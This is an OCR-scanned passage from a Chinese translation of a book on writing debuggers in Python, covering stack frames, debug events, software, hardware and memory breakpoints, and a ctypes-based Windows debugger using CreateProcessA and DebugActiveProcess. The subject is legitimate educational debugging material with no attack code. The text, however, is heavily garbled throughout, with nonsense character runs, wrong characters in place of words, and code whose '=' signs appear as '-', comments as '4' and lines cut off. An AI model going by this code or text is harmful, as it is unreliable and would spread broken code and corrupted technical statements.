当 my_sock()MAG0REINat fx, "C RmEÉHUAEBHUSBESZ (返回 地 址 弹 到 EIP) , 
然后 跳 到 返回 地 址 (Return address) 指 向 的 地 方 〈 父 函数 的 代码 段 ) 继续 执行 。 另 
一 个 需要 考虑 的 概念 就 是 本 地 函数 。 把 我 们 的 my_socks() 范 数 扩 展 一 点 ， 让 我 们 
假定 函数 被 调用 后 做 的 第 一 件 事 就 是 申请 一 个 字符 串 数组 ， 将 参数 color_one 复制 
到 数组 里 。 代 码 应 该 像 这 样 : 





int my socks(color one, color ) 


char stinky sock color on[10]; 


HAUSER E Aà stinky_sock_color_on 变量 的 空间 ， 以 便 在 栈 里 调用 (当然 会 随 
aN 数 的 执行 完毕 而 释放 ， 不 过 在 函数 内 部 访问 时 ， 效 率 会 高 很 多 ) 。 申 请 成 功 以 
后 ， 堆 栈 的 结 MERA 2-2 看 到 的 这 样 。 


| 
Stack growth direction 


Figure 2-2: 在 stinky. sock color one 申请 后 的 栈 框架 
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的 。 调 试 器 对 堆栈 结构 的 捕捉 能 力 是 相当 有 用 的 ， 特 别 是 在 我 们 捕捉 程序 崩溃 ， 跟 
踪 调 查 基 于 栈 的 缓冲 区 浴 出 的 时 候 。 





2.3 调试 事件 


调试 器 在 调试 程序 的 时 候 会 一 直 循 环 等 待 ， 直 到 检测 到 一 个 调试 事件 的 发 生 。 当 调 
试 事 件 发 生 的 时 候 ， 就 会 调用 一 个 和 与 之 对 应 的 事件 处 理 画 数 。 


处 理 函 数 被 调用 的 时 候 ， 调 试 器 会 暂停 程序 等 待 下 一 步 的 指示 。 以 下 的 这 些 事件 是 
一 个 调试 器 必须 能 够 捕捉 到 的 (也 叫做 陷入 ) : 


。 断 点 触发 
e 内 存 违 例 〈 也 叫做 访问 违例 或 者 段 错误 ) 
e 程序 异常 


每 个 操作 系统 都 使 用 不 同 的 方法 将 这 些 事 件 传递 给 调试 器 ， 这 些 留 到 操作 系统 章节 
详细 介绍 。 部 分 的 操作 系统 ， 能 捕捉 〈 陷 人 ) 更 多 的 事件 ， 比 如 在 线程 或 者 进程 的 
创建 以 及 动态 链接 库 的 加 载 的 时 候 。 


一 个 优秀 的 调试 器 必须 是 可 定制 脚本 的 ， 能 够 自 定义 事件 处 理 汞 数 从 而 对 程序 进 行 
自动 化 调试 。 举 个 例子 ， 一 个 内 存 访问 违例 产生 的 缓冲 区 浴 出 ， 对 于 黑客 来 说 相当 
的 有 趣 。 如 果 在 平时 正常 的 调试 中 你 就 必须 和 调试 器 交互 ， 一 步 一 步 的 收集 信息 。 
但 是 当 你 使 用 定制 好 的 脚本 操作 调试 器 的 时 候 ， 它 就 能 够 建立 起 相对 应 的 事件 义理 
函数 ， 并 自动 化 的 收集 所 有 相关 的 信息 。 这 不 仅仅 节省 了 时 间 ， 还 让 我 们 更 全 面 的 
控制 整个 调试 过 程 。 


2.4 断 点 


当 我 们 需要 让 被 调试 程序 暂停 的 时 候 就 需要 用 到 断 点 。 通 过 暂停 进程 ， 我 们 能 观察 
变量 ， 堆 栈 人 参数 以 及 内 存 数据 ， 并 且 记 录 他 们 。 断 点 有 非常 多 的 好 处， 当 你 调试 进 
程 的 时 候 这 些 功 能 会 让 你 觉得 很 舒 殉 。 断 点 主要 分 成 三 种 : 软件 断 点 ， 硬 件 断 点 ， 
内 存 断 点 。 他 们 有 非常 相似 的 工作 方式 ， 但 实现 的 手段 却 各 不 相同 。 


2. 4. 1 软件 断 点 


软件 断 点 具体 而 言 就 是 在 CPU 执行 到 特定 位 置 的 代码 的 时 候 使 其 暂停 。 软 件 断 点 
将 会 使 你 在 调试 过 程 中 用 的 最 多 的 断 点 。 软 件 断 点 的 本 质 就 是 一 个 单字 节 的 指 今 ， 
用 于 暂停 被 执行 程序 ， 并 将 控制 权 转 移 给 调试 器 的 断 点 处 理 画 数 。 在 搞 明白 它 是 如 
何 工作 之 前 你 必须 先 弄 清楚 在 X86 汇编 里 指 分 和 操作 码 的 差别 。 


汇编 指令 是 CPU 执行 的 命令 的 高 级 表示 方法 。 举 个 例子 


MOV EAX, EBX 


个 指令 告诉 CPU 把 存储 在 EBX 寄存 器 里 的 东西 放 到 EAX 寄存 器 里 。 相 当 简 
不 是 吗 ? 然 而 CPU 根本 不 明白 刚才 的 指 分 ， 它 必 须 被 转化 成 一 种 叫做 操作 码 
i 操作 码 (opcode) 就 是 operation code, CPU 能 理解 并 执行 的 语言 。 前 
的 汇编 指令 转化 成 操作 码 就 是 下 面 这 样 : 


如 你 说 见 ， 幕 后 正在 进行 的 操作 相当 的 令 人 困惑 ， 但 这 确实 是 CPU 的 语言 。 你 可 

以 把 汇编 指令 想象 成 CPU 们 的 DNS (一 种 解析 域名 和 IP 的 网 络 服务 ) 。 你 不 用 

再 一 个 个 的 记忆 复杂 难 懂 的 操作 码 (类似 IP 地 址 ) ， 取 而 代 之 的 是 简 单 的 汇编 的 
指令 ， 最 后 这 些 指令 都 会 被 汇编 器 转换 成 操作 码 。 在 日 常 的 调试 中 你 很 少 会 用 到 操 
作 码 ， 但 是 他 们 对 于 理解 软件 断 点 的 用 途 非常 重要 。 


如 果 我 们 先前 讲解 的 指令 发 生 在 0x4433221 这 个 地 址 ， 一 般 是 这 样 显示 的 : 


0x44332211: 8BC3 MOV EAX, EBX 


这 里 显示 了 地 址 ， 操 作 码 ， 和 高 级 的 汇编 指令 。 为 了 在 这 个 地 址 设置 断 点 ， 和 暂停 
CPU, 我 们 将 从 2 个 字 节 的 8BC3 操作 码 中 换 出 一 个 单字 节 的 操作 码 。 这 个 单字 
节 的 操作 码 也 就 是 3 号 中 断 指 全 (INT 3) ， 一 条 能 让 CPU 暂停 的 指令 。3 号 中 断 
转换 成 操作 码 就 是 0xCC。 这 里 是 设置 断 点 前 和 A T EB BN LE : 


在 断 点 被 设置 前 的 操作 码 


0x44332211: 8BC3 MOV EAX, EBX 


断 点 被 设置 后 的 操作 码 


0x44332211: CCC3 MOV EAX, EBX 


很 明显 原 操作 码 中 的 8B 被 替换 成 了 CC, :4 CPU 执行 到 这 个 操作 码 的 时 候 ，CPU 
暂停 ， 并 触发 一 个 INT3(3 号 中 断 ) 事 件 。 调 试 器 自身 能 义理 这 个 事件 ， 但 是 为 了 设 
计 我 们 自己 的 调 斌 器， 明白 调试 器 是 如 何 具体 操作 的 很 重要 。 当 调试 器 被 告知 在 目 
标 地 址 设置 一 个 断 点 ， 它 首先 读 取 目 标 地 址 的 第 一 个 字 节 的 操作 码 ， 然 后 保存 起 
来 ， 同 时 把 地 址 存储 在 内 部 的 中 断 列 表 中 。 接 着 ， 调 试 器 把 一 个 字 节 操作 码 CC 写 
入 刚才 的 地 址 。 当 CPU 执行 到 CC 操作 码 的 时 候 就 会 触发 一 个 INT3 中 断 事 件 ， 
此 时 调试 器 就 能 捕捉 到 这 个 事件 。 调 试 器 继续 判断 这 个 发 生 中 断 事 件 的 地 址 (通过 
EIP 指针 ， 指 邻 指 针 ) 是 不 是 自己 先前 设置 断 点 的 地 址 。 如 果 在 调 试 器 内 部 的 断 点 
列表 中 找到 了 这 个 地 址 ， 就 将 设置 断 点 前 存储 起 来 的 操作 码 写 回 到 目标 地 bk, He 
进程 被 调试 器 恢复 后 就 能 正常 的 执行 。 图 2-3 对 此 进行 了 详细 的 描绘 。 


Breakpoint List 







Address 


Pam [s 





Q Debugger is instructed to set a 
breakpoint on 0x44332211; @ Overwrite the first byte with the 
it reads in and stores the first byte. OxCC (INT 3) opcode. 


CPU (EIP) — | 0x44332211: 883 MOV EAX, EBX 


© When the CPU hits the breakpoint, 
the internal lookup occurs, and the 
byte is flipped back. 


d & 





图 2-3: 软 件 断 点 的 处 理 过 程 


有 两 种 类 型 的 软件 断 点 可 以 被 设置 : 一 次 性 断 点 和 持续 性 断 点 。 一 次 性 断 点 意味 
着 ， 一 且 断 点 被 触发 〈 命 中 ) 一 次 ， 它 就 会 从 内 部 中 断 列表 清除 掉 。 一 个 持久 性 断 
点 在 CPU 触发 后 会 重新 存储 在 内 部 的 断 点 列表 里 ， 以 后 每 次 运行 到 这 里 还 会 中 


然而 软件 断 点 有 一 个 问题 : 当 你 改变 了 被 调试 程序 的 内 存 数据 的 时 候 ， 你 同时 改变 
[fik 行 时 的 软件 的 循环 元 余 码 校 验 合 (CRC) 。CRC 是 一 种 校 验 数 据 是 否 被 改变 
的 范 数 ， 它 被 广 泛 的 应 用 于 文件 ， 内 存 ， 文 本 ， 网 络 数 据 包 和 任何 你 想 监 视 数 据 改 
变 的 地 方 。 CRC 将 一 定 范围 内 的 数据 进行 hash (AMI) 计算 ， 在 逆向 工程 中 一 
般 是 对 进程 的 内 存 数据 进行 运算 ， 然后 将 hash 值 和 此 前 原始 的 hash 值 进 行 比 
较 ， 以 判断 数据 是 否 被 改变 。 如 果 不 同 说 明 数 据 被 改动 了 ， 校 验 失 败 。 这 点 很 重 
要 ， 因 为 病毒 程序 经 常 检 测 程序 在 内 存 中 运行 的 代码 的 CRC 值 是 否 相 同 ， 不 同 说 
明 数 据 被 修改 ， 则 自动 杀 死 自己 。 为 了 在 这 种 特殊 的 情况 下 也 能 正常 的 进行 调试 工 
作 ， 就 要 使 用 硬件 断 点 了 。 


2.4.2 硬件 断 点 


UEM 尤其 是 当 想 在 一 小 块 区 域内 设置 断 点 ， 但 是 又 不 能 修改 它们 的 
时 候 。 

这 种 类 型 的 断 点 被 设置 在 CPU 级 别 ， 并 用 特定 的 寄存 器 : 调试 寄存 器 。 一 个 CPU 
一 般 会 有 8 个 调试 寄存 器 (DRO 寄存 器 到 DR7 寄存 器 ) ， 它 们 被 用 于 管理 硬件 断 
点 。 调 试 寄存 器 DRO 到 调试 寄存 器 DR3 存储 硬件 断 点 地 址 。 这 意味 着 你 同一 时 间 
内 最 多 只 能 有 4 个 硬件 断 点 。 DR4 和 DR5 保留 。DR6 是 状态 寄存 器 ， 说 明了 被 

断 点 触发 的 调试 事件 的 类 型 。DR7 本 质 上 是 一 个 硬件 断 点 的 开关 寄存 器 ， 同 时 也 

三 备 了 断 万 的 不 同 类 型 。 通 过 在 DR7 寄存 器 里 设置 不 同 标志 ， 能 够 创建 以 下 几 种 


e 当 特 定 的 地 址 上 有 指令 执行 的 时 候 中 断 
e 当 特 定 的 地 址 上 有 数据 可 以 写 入 的 时 候 


e 当 特 定 的 地 址 上 有 数据 读 或 者 写 但 不 执行 的 时 候 这 非常 有 用 ， 当 你 要 设置 特定 
的 断 点 (至 多 4 个 ) ， 又 不 能 修改 运行 的 进程 的 时 候 。 


图 2-4 显示 了 与 硬件 断 点 的 状态 ， 长 度 和 地 址 相关 的 字段 。 


Layout of DR7 Register 


Type | len | Type | Len | Type | Len | Type len 


ZZ DR | DR | DR | DR | DR | DR | DR | DR 
a) el eels 

















DR7 with 1-byte Execution Breakpoint Set at 0x44332211 





0x44332211 





DR7 with Additional 2-byte Read/Write Breakpoint at 0x55667788 









0x55667788 


— 79] 


Breakpoint Flags Breakpoint Length Flags 


00 - Break on execution 00 - | byte 
01 - Break on data writes 01 - 2 bytes (WORD) 
11 - Break on reads or writes but not execution 11 - 4 bytes (DWORD) 


图 2-4:DR7 寄存 器 决定 了 断 点 的 类 型 


0-7 位 是 硬件 断 点 的 激活 与 关闭 开关 。 在 这 七 位 中 L 和 G 字段 是 局 部 和 全 局 作用 域 
的 标志 。 我 把 两 个 位 都 设置 了 ， 以 我 的 经 验 用 户 模式 的 调试 中 只 设置 一 个 就 能 工 
作 。 8-25 位 在 我 们 一 般 的 调试 中 用 不 到 ， 在 x86 的 手册 上 你 可 以 找到 关于 这 些 字 
节 的 详细 解释 。16-31 位 决定 了 设置 在 4 个 断 点 寄存 器 中 硬件 断 点 的 类 型 与 长 度 。 


和 软件 断 点 不 同 ， 硬 件 断 点 不 是 用 INT3 中 断 ， 而 是 用 INT1(1 号 中 断 ).INT1 负责 硬 
件 中 断 和 步 进 事件 。 步 进 ( Single-step ) 意味 着 一 步 一 步 的 执行 指令 ， 从 而 精确 
的 观察 关键 代码 以 便 监 视 数 据 的 变化 。 在 CPU 每 次 执行 代码 之 前 ， 都 会 先 确认 当 
前 将 执行 的 代码 的 地 址 是 否 是 硬件 断 点 的 地 址 ， 同 时 也 要 确认 是 否 有 代码 要 访问 被 
设置 了 硬件 断 点 的 内 存 区 域 。 如 果 任 何 储存 在 DRO-DR3 中 的 地 址 所 指向 的 区 域 被 
访问 了 ， 就 会 触发 INT1 中 断 ， 同 时 暂 停 CPU。 如 果 没 有 ，CPU 执行 代码 ， 到 下 
一 行 代码 时 ，CPU 继续 重复 上 面 的 检查 。 

硬件 断 点 极其 有 用 ， 但 是 也 有 一 些 限制 。 一 方面 你 同一 时 间 只 能 设置 四 个 断 点 ， 另 
一 方面 断 点 起 作用 的 区 域 只 有 4 个 字 节 (也 就 是 检测 4 个 字 节 的 内 存 数据 改变 ) o 
如 果 你 想 跟踪 一 大 块 内 存 数 括 ， 就 办 不 到 了 。 为 了 解决 这 个 问题 ， 你 就 妥 用 到 内 存 
断 点 。 


2.4.3 内 存 断 点 


内 存 断 点 其 实 不 是 真正 的 断 点 。 当 一 个 调试 器 设置 了 一 个 内 存 断 点 的 时 候 ， 它 其 实 
是 改变 了 内 存 中 某 个 块 或 者 页 的 权限 。 一 个 内 存 页 是 操作 系统 义理 的 最 小 的 内 存单 
位 。 一 个 内 存 页 被 申请 成 功 以 后 ， ee 个 权限 集 ， 它 决定 了 内 存 该 如 何 被 访 
问 。 下 面 是 一 些 内 存 页 的 访问 权限 的 例子 


e 可 执行 页 允许 执行 但 不 允许 读 或 写 ， 否 则 抛 出 访问 异常 
可 读 页 只 人 允许 从 页 面 中 读 取 数据 ， 其 余 的 则 抛 出 访问 异常 
e 可 写 页 允许 将 数据 写 入 页 面 


任何 对 保护 页 的 访问 都 会 引发 异常 ， 之 后 页 面 恢复 访问 前 的 状态 


大 多 数 系统 允许 你 综合 这 些 权 限 。 举 个 例子 ， 你 能 有 在 内 存 中 创建 一 个 页 面 ， 既 能 
读 又 能 写 ， 同 时 另 一 个 页 面 既 能 污 又 能 执行 。 每 一 个 操作 系统 都 有 内 建 的 范 数 让 你 
查询 当前 内 存 页 (并 不 是 所 有 的 ) 的 权限 ， 并 且 修 改 它们 。 参 考 图 2-5 观察 不 同 权 
限 的 内 存 页 面 数据 是 如 何 访问 的 。 


Read, Write, or Execution Read 
flags ona memory page — 8141910101 10101001010101010010110101010101001 W Write 
allow data to be moved in Fie ibaa abate init ane Execute 


and out or executed on. 


Any type of data access 
on a guard page will 
result in an exception 
being raised. The original 
data operation will fail. 


R 
010101010110101001010101010010110101010101001 " 


GUARD PAGE EXCEPTION 





图 2-5: 各 种 不 同 权限 的 内 存 页 这 里 我 们 感 兴趣 的 是 保护 页 (Guard Page) 。 这 种 类 
型 的 页 面 常 被 用 于 : 分 离 堆 和 栈 或 者 


确保 一 部 分 内 存 数据 不 会 增长 出 边界 。 另 一 种 情况 ， 就 是 当 一 Dee e 
程 命中 ( 访 问 ) 了 ， 就 暂停 进程 。 举 个 例子 ， 如 果 我 们 在 逆向 一 个 网 络 服务 程序 ， 

在 其 接收 到 网 络 数据 包 以 后 ， 我 们 在 存储 数据 包 的 内 存 上 设 "T 接着 运行 程 
序 ， 一 旦 有 任何 对 保护 页 的 访 问 ， 都 会 使 CPU 暂停 ， 抛 出 一 个 保护 页 调试 异常 ， 

这 时 候 我 们 就 能 确定 程序 是 在 什么 时 候 用 什么 方式 访问 接收 到 的 数据 了 。 之 后 再 进 
一 步 跟 踪 观 察 访问 内 存 的 指 合 ， 继 而 确定 程序 对 数据 做 了 什么 操作 。 这 种 断 点 同时 
也 解决 了 软件 断 点 数据 更 新 的 问题 ， 因 为 我 们 没有 修改 任 何 运行 着 的 代码 。 


到 目前 为 止 ， 我们 已 经 讲解 完了 调试 器 的 基础 知识 和 工作 原理 ， 接 下 来 我 们 要 亲自 
动手 写 一 个 Python 调试 器 ， 这 个 基于 Windows 的 轻 量 级 调试 器 ， 将 会 用 到 我 们 
目前 学 到 的 所 有 知识 。 


3 自己 动手 写 一 个 windows 调试 器 


现在 我 们 已 经 讲解 完了 基础 知识 ， 是 时 候 实 现 一 个 真正 的 的 调试 器 的 时 候 了 。 当 微 
软 开 发 windows 的 时 候 ， 他 们 增加 了 一 大 堆 的 倒 人 惊喜 的 调试 函数 以 帮助 开发 者 
们 保证 产品 的 质量 。 我 们 将 大 量 的 使 用 这 些 函 数 创建 你 自己 的 纯 python 调试 器 。 
有 一 点 很 重要 ， 我 们 本 质 上 是 在 深入 的 学 习 PyDbg(Pedram Amini's ) 的 使 用 ， 这 是 
目前 能 找到 的 最 简洁 的 Windows 平台 下 的 Python 调试 器 , $$ Pedram 所 网， 我 
尽 可 能 用 PyDbg 完成 了 我 的 代码 (包括 函数 名 ， 变 量 ， 等 等 ) ， 同 时 你 也 可 以 更 
容易 的 用 PyDbg 实现 你 的 调试 器 。 


为 了 对 一 个 进程 进行 调试 ， 你 首先 必须 用 一 些 方法 把 调试 器 和 进程 连接 起 来 。 所 
以 ， 我 们 的 调试 器 要 不 然 就 是 装载 一 个 可 执行 程序 然后 运行 它 ， 要 不 然 就 是 动态 的 
附加 到 一 个 运行 的 进程 。Windows 的 调试 接口 (Windows debugging API) 提供 
了 一 个 非常 简单 的 方法 完成 这 两 点 。 


运行 一 个 程序 和 附加 到 一 个 程序 有 细微 的 差别 。 打 开 一 个 程序 的 优点 在 于 他 能 在 程 
序 运 行 任何 代码 之 前 完全 的 控制 程序 。 这 在 分 析 病 毒 或 者 恶意 代码 的 时 候 非 常 有 
用 。 附 加 到 一 个 进程 ， 信 仅 是 强行 的 进入 一 个 已 经 运行 了 的 进程 内 部 ， 它 允许 你 跳 
过 启动 部 分 的 代码 ， 分 析 你 感 兴趣 的 代码 。 你 正在 分 析 的 地 方 也 就 是 程序 目前 正在 
执行 的 地 方 。 


第 一 种 方法 ， 其 实 就 是 从 调试 器 本 身 调用 这 个 程序 (调试 器 就 是 父 进 程 ， 对 被 调试 
进程 的 控制 权限 更 大 ) o E Windows 上 创建 一 个 进程 用 CreateProcessA()ER ZR 
将 特定 的 标志 传 进 这 个 函数 ， 使 得 目标 进程 能 够 被 调试 。 一 个 CreateProcessA() 
调用 看 起 来 像 这 样 : 


BOOL WINAPI CreateProcessA( 
LPCSTR lpApplicationName, 
LPTSTR lpCommandLine, 
LPSECURITY ATTRIBUTES lpProcessAttributes, 
LPSECURITY ATTRIBUTES lpThreadAttributes, 
BOOL bInheritHandles, 
DWORD dwCreationFlags, 
LPVOID lpEnvironment, 
LPCTSTR lpCurrentDirectory, 
LPSTARTUPINFO lpStartupInfo, 
LPPROCESS INFORMATION lpProcessInformation 
); 
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以 便 理 解 。 这 里 我 们 只 关心 在 调试 器 中 创建 一 个 进程 需要 注意 的 参数 。 这 些 参数 是 
IpApplicationName,IpCommandLine,dwCreationFlags,IpStartuplnfo， 和 

IpProcesslnformation。 剩余 的 参数 可 以 设置 成 空 值 (NULL) 。 关 于 这 个 画 数 的 详 
细 解 释 可 以 查看 MSDN( 微 软 之 葵 花 宝 典 )。 最 前 面 的 两 个 参数 用 于 设置 ， 需 要 执行 
的 程序 的 路 径 和 我 们 希望 传递 给 程序 的 参 数 。dwCreationFlags (创建 标记 ) 参数 
接受 一 个 特定 值 ， 表 示 我 们 希望 程序 以 被 调试 的 状态 启动 。 最 后 两 个 参数 分 


别 分 别 指向 2 个 结构 (STARTUPINFO and PROCESS INFORMATION) , 不 
仅 包含 了 进程 如 何 启 动 ， 以 及 启动 后 的 许多 重要 信息 。 (IpStartuplnfo : 
STARTUPINFO 结构 ， 用 于 在 创建 子 进程 时 设置 各 种 属性 ， 
IpProcessInformation : PROCESS INFORMATION 结构 ， 用 来 在 进程 创建 后 接收 
相关 信息 ， 该 结构 由 系统 填写 。) 


创建 两 个 Python 文件 my_debugger.py 和 my_debugger_defines.py。 我 们 将 创建 
一 个 父 类 debugger() 接着 逐渐 的 增加 各 种 调试 画 数 。 另 外 ， 把 所 有 的 
结构 ， 联 合 ， 常 量 放 到 my debugger defines.py 方便 以 后 维护 。 


# my debugger defines.py 

from ctypes import * 

# Let's map the Microsoft types to ctypes for clarity 

WORD - c ushort 

DWORD - c ulong 

LPBYTE - POINTER(c ubyte) LPTSTR - POINTER(c char) 

HANDLE - c void p 

# Constants 

DEBUG PROCESS - 0x00000001 

CREATE NEW CONSOLE - 0x00000010 

# Structures for CreateProcessA() function 

class STARTUPINFO(Structure): 

fields = [ 

("cb", DWORD), 
("lpReserved", LPTSTR), 
("lpDesktop", LPTSTR), 
("lpTitle", LPTSTR), 
("dwX", DWORD), 
("dwY", DWORD), 
("dwXSize", DWORD), 
("dwYSize", DWORD), 
("dwXCountChars", DWORD), 
("dwYCountChars", DWORD), 
("dwFillAttribute",DWORD), 
("dwFlags", DWORD), 
("wShowwWindow", WORD), 
("cbReserved2", WORD), 
("lpReserved2", LPBYTE), 
("hstdInput", HANDLE), 
("hstdOutput", HANDLE), 
("hStdError", HANDLE), 


class PROCESS INFORMATION(Structure): 
fields = [ 
("hProcess", HANDLE), 
("hThread", HANDLE), 
("dwProcessId", DWORD), 
("dwrhreadId", DWORD), 


] 
# my debugger.py 
from ctypes import * 
from my debugger defines import * 


kernel32 - windll.kernel32 
class debugger(): 
def init (self): 
pass 
def load(self,path to exe): 
4 dwCreation flag determines how to create the process 
4 set creation flags = CREATE NEW CONSOLE if you want 
4 to see the calculator GUI 
creation flags - DEBUG PROCESS 
# instantiate the structs 
startupinfo = STARTUPINFO() 
process information = PROCESS INFORMATION() 
# The following two options allow the started process 
4 to be shown as a separate window. This also illustrates 
# how different settings in the STARTUPINFO struct can affe 
# the debuggee. 
startupinfo.dwFlags = 0x1 
startupinfo.wShowWindow = 0x60 
# We then initialize the cb variable in the STARTUPINFO sti! 
4 which is just the size of the struct itself 
startupinfo.cb - sizeof(startupinfo) 
if kernel32.CreateProcessA(path to exe, 
None, 
None, 
None, 
None, 
creation flags, 
None, 
None, 
byref(startupinfo), 
byref(process information)): 
print "[*] we have successfully launched the process!" 
else: 
print "[*] Error: 0x%08x." % kernel32.GetLastError() 


IE 


现在 我 们 将 构造 一 个 简短 的 测试 模块 确定 一 下 一 切 都 能 正常 工作 。 调 用 
my _test.py， 保 证 前 面 的 文件 都 在 同一 个 目录 下 。 





#my_test.py 
import my_debugger 
debugger = my debugger.debugger() debugger .load("C:\\WINDOWS\\syste 





如 果 你 是 通过 命令 行 或 者 DE 手动 输入 上 面 的 代码 ， 将 会 新 产生 一 个 进程 也 就 是 你 
键 人 程序 名 ， 然 后 返回 进程 ID (PID) ， 最 后 结束 。 如 果 你 用 上 面 的 例子 
calc.exe， 你 将 看 不 到 计算 器 的 图 形 界 面 出 现 。 因 为 进程 没有 把 界面 绘画 到 屏幕 
上 ， 它 在 等 待 调试 器 继续 执行 的 命 合 。 很 快 我 们 就 能 让 他 继续 执行 下 去 了 。 不 过 在 
这 之 前 ， 我 们 已 经 找到 了 如 何 产生 一 个 进程 用 于 调试 ， 现 在 让 我 们 实现 另 一 个 功 
能 ， 附 加 到 一 个 正在 运行 的 进程 。 


为 了 附加 到 指定 的 进程 ， 就 必须 先 得 到 它 的 句柄 。 许 多 后 面料 用 到 的 函数 都 需要 名 
柄 做 参数 ， 同 时 我 们 也 能 在 调试 之 前 确认 是 否 有 权限 调试 它 〈 如 果 附 加 都 不 行 ， 就 
别提 调试 了 ) 。 这 个 任务 由 OpenProcess() 完 成 ， 此 函数 由 kernel32.dll 库 倒 出 
原型 如 下 : 


HANDLE WINAPI OpenProcess( 
DWORD dwDesiredAccess, 
BOOL bInheritHandle 
DWORD dwProcessId 


): 


dwDesiredAccess 参数 决定 了 我 们 希望 对 将 要 打开 的 进程 拥有 什么 样 的 权限 (当然 
是 越 大 越 好 rootis hack) 。 因 为 要 执行 调试 ， 我 们 设置 成 

PROCESS ALL ACCESS, blnheritHandle 参数 设置 成 False, dwProcessld 参 
数 设置 成 我 们 希望 获得 句柄 的 进程 ID ， 也 就 是 前 面 获得 的 PID。 如 果 画 数 成 功 执 
行 ， 将 返回 一 个 目标 进程 的 句柄 。 


接 下 来 用 DebugActiveProcess() 函 数 附 加 到 目标 进程 : 


BOOL WINAPI DebugActiveProcess( 
DWORD dwProcessId 


): 


把 需要 a 附加 的 PID 传人 。 一 且 系 统 认为 我 们 有 权限 访问 目标 进程 ， 目 标 进程 就 假 
定 我 们 的 调试 器 已 经 准备 好 义理 调试 事件 ， 然 后 把 进程 的 控制 权 转 移 给 调试 器 。 调 
试 器 接着 循 环 调用 WaitForDebugEvent() 以 便 爷 获 调试 事件 。 加 数 原 型 如 下 : 


BOOL WINAPI WaitForDebugEvent( 
LPDEBUG EVENT lpDebugEvent, 
DWORD dwMilliseconds 


): 


第 一 个 参数 指向 DEBUG EVENT 结构 ， 这 个 结构 描述 了 一 个 调试 事件 。 第 二 个 参 
数 设 ER INFINITE (无 限 等 待 ) ， 这 样 WaitForDebugEvent() 就 不 用 返回 ， 一 直 
等 待 直到 一 个 事 件 产生 。 


调试 器 捕捉 的 每 一 个 事件 都 有 相关 联 的 事件 处 理 函 数 ， 在 程序 继续 执行 前 可 以 完成 
不 同 的 操作 。 当 处理 范 数 完成 了 操作 ， 我 们 希望 进程 继续 执行 用 
， 这 时 候 再 调用 ContinueDebugEvent()。 原 型 如 下 : 


BOOL WINAPI ContinueDebugEvent( 
DWORD dwProcessId, 
DWORD dwThreadId, 
DWORD dwContinueStatus 


): 


dwProcessld 和 dwThreadld 参数 由 DEBUG EVENT 结构 里 的 数据 填充 ， 当 调试 
器 捕捉 到 调试 事件 的 时 候 ， 也 就 是 WaitForDebugEvent() 成 功 执行 的 时 候 ， 进 程 
ID 和 线程 ID 就 以 及 初始 化 好 了 。dwContinueStatus 参数 告诉 进程 是 继续 执行 
(DBG_CONTINUE)， 还 是 产生 异 常 (DBG_EXCEPTION_NOT_HANDLED)。 


还 剩 下 一 件 事 没 做 ， 从 进程 分 离 出 来 : 把 进程 ID 传递 给 
DebugActiveProcessStop(), 现在 我 们 把 这 些 全 合 在 一 起 ， 扩 展 我 们 的 

my debugger 类 ， 让 他 拥有 附加 和 分 离 一 个 进程 的 功能 。 同 时 加 上 打开 一 个 进程 和 
获得 进程 句柄 的 能 力 。 最 后 在 我 们 的 主 循环 里 完成 事 件 义理 函数 。 打 开 

my debugger.py 键 和 人 以 下 代码 。 


提示 : 所 有 需要 的 结构 ,联合 和 常量 都 定义 在 了 debugger defines.py 文件 里 ， 完 整 
的 代码 可 以 从 http:/Awww.nostarch.com/ghpython.htm 下 载 。 


#my_debugger . py 
from ctypes import * 
from my_debugger_defines import * 
kernel32 = windll.kernel32 
class debugger(): 
def init (self): 
self.h_process = None 
self.pid = None 
self.debugger active = False 
def load(self, path_to_exe): 


print "[*] We have successfully launched the process!" 
print "[*] PID: %d" % process information.dwProcessId 

# Obtain a valid handle to the newly created process 

# and store it for future access 

self.h_process = self.open process(process information.dwP! 


def open process(self,pid): 
h process = kernel32.0penProcess(PROCESS ALL ACCESS, pid, Fa- 
return h process 
def attach(self,pid): 
self.h process - self.open process(pid) 
4 We attempt to attach to the process 
# if this fails we exit the call 
if kernel32.DebugActiveProcess(pid): 
self.debugger active - True 
self.pid - int(pid) 
self.run() 
else: 
print "[*] Unable to attach to the process." 
def run(self): 
# Now we have to poll the debuggee for 
# debugging events 
while self.debugger active -- True: 
self.get debug event() 
def get debug event(self): 
debug event - DEBUG EVENT() 
continue status- DBG CONTINUE 
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if kernel32.WaitForDebugEvent(byref(debug event), INFINITE) 
4 We aren't going to build any event handlers 
# just yet. Let's just resume the process for now. 
raw input("Press a key to continue...") 
self.debugger active - False 
kernel32.ContinueDebugEvent( \ 
debug event.dwProcessId, \ 
debug event.dwThreadId, \ 
continue status ) 
def detach(self): 
if kernel32.DebugActiveProcessStop(self.pid): 
print "[*] Finished debugging. Exiting..." 
return True 
else: 
print "There was an error" return False 





现在 让 我 们 修改 下 测试 套件 以 便 使 用 新 创建 的 函数 。 


#my_test.py 

import my_debugger 

debugger = my debugger.debugger() 

pid - raw input("Enter the PID of the process to attach to: ") 
debugger.attach(int(pid)) 

debugger .detach() 


按 以 下 的 步骤 进行 测试 (windows F) 


1 
. 右 击 桌面 低 端 的 任务 栏 ， 从 退出 的 菜单 中 选择 任务 管理 器 。 


9. 
10. 
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选择 开始 -> 运行 -> 所 有 程序 -> 附件 -> 计算 器 


选择 进程 面板 . 


.如 果 你 没 看 到 PID 栏 ， 选 择 查看 -> 选择 列 

. 确保 进程 标识 符 (PID) 前 面 的 确认 框 是 选中 的 ， 然 后 单 击 OK. 

.找到 calc.exe 相关 联 的 PID 

. 执行 my_test.py 同时 前 面 找到 的 PID 传递 给 它 。 

. 4 Press a key to continue... 打 印 在 屏幕 上 的 时 候 ， 试 着 操作 计算 器 的 界面 。 


你 应 该 什么 键 都 按 不 了 。 这 是 因为 进程 被 调 试 器 挂 起 来 了 ， 等 待 进一步 的 指 
小 。 


在 你 的 Python 控制 台 里 按 任何 的 键 ， 脚 本 将 输出 别 的 信息 ， 热 爱 后 结束 。 
现在 你 能 够 操作 计算 器 了 。 


如 果 一 切 都 如 描绘 的 一 样 正常 工作 ， 把 下 面 两 行 从 my debugger.py 中 注释 掉 : 


# raw input("Press any key to continue...") 
4 self.debugger active = False 


现在 我 们 已 经 讲解 了 获取 进程 句柄 的 基础 知识 ， 以 及 如 何 创建 一 个 进程 ， 附 加 一 个 
运行 的 进程 ， 接 下 来 让 我 们 给 调试 器 加 入 更 多 高 级 的 功能 。 


3.2 获 得 CPU 寄存 器 状态 


